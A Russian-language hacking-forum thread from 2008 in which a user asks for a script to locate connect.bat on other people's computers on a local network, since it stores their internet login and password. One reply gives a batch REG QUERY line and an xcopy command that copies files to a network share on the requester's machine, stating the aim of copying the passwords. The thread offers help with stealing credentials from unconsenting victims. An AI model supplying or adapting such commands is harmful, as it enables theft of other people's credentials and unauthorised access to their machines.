terminal-s52

Объявление

Администрация форума не несет никакой ответственности за действия пользователей! Уважаемые пользователи всю информацию и софт вы используете на свой страх и риск! Приятного пребывания на форуме!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » terminal-s52 » Хакинг » поиск файла на чужом компе


поиск файла на чужом компе

Сообщений 1 страница 5 из 5

1

Мне надо такой скрипт, который бы нашел файл на чужем компе и выдал его адрес, или скопировал его в папку на моем компе. Напишите и если можно с объяснениями

0

2

э-э-э... тебе надо что б это где работало?
в домашней сети между двумя компами
или в большой сети по городу или в интернете??? правильно формулируй вопрос!

0

3

Во первых, как правильно заметили, ты некорректно вопрос ставишь! А во вторых зачем тебе какой-то гемор со скриптами! Есть куча других намного легче способов добыть айпишник!

0

4

В домашней сети между двумя компами, мне не надо знать айпишник, я хочу найти файл connect.bat. Просто у многих пацанов из моей сетки стоит рабочий стол как у Гены из хоттабыча, а в файле connect.bat хранится имя пользователя и его пароль к подключению интернета

0

5

GoodWIN Тут все просто считываешь ключ реестра
HKEY_USERS\S-1-5-21-1708537768-1844237615-725345543-1003\Control Panel\Desktop" /V ConvertedWallpaper

строчка для батика
REG QUERY "HKEY_USERS\S-1-5-21-1708537768-1844237615-725345543-1003\Control Panel\Desktop" /V ConvertedWallpaper

xcopy desktop \\твая комп\папка для копирования\  /y /z  /e /q /g /h

p.s. папка в которую ты хочеш пароли скопировать должна иметь атрибуты чтение и запись по сети !

Дальше разберёшься ?

если нет пиши вличку!

Отредактировано inname3 (2008-07-04 15:11:18)

0


Вы здесь » terminal-s52 » Хакинг » поиск файла на чужом компе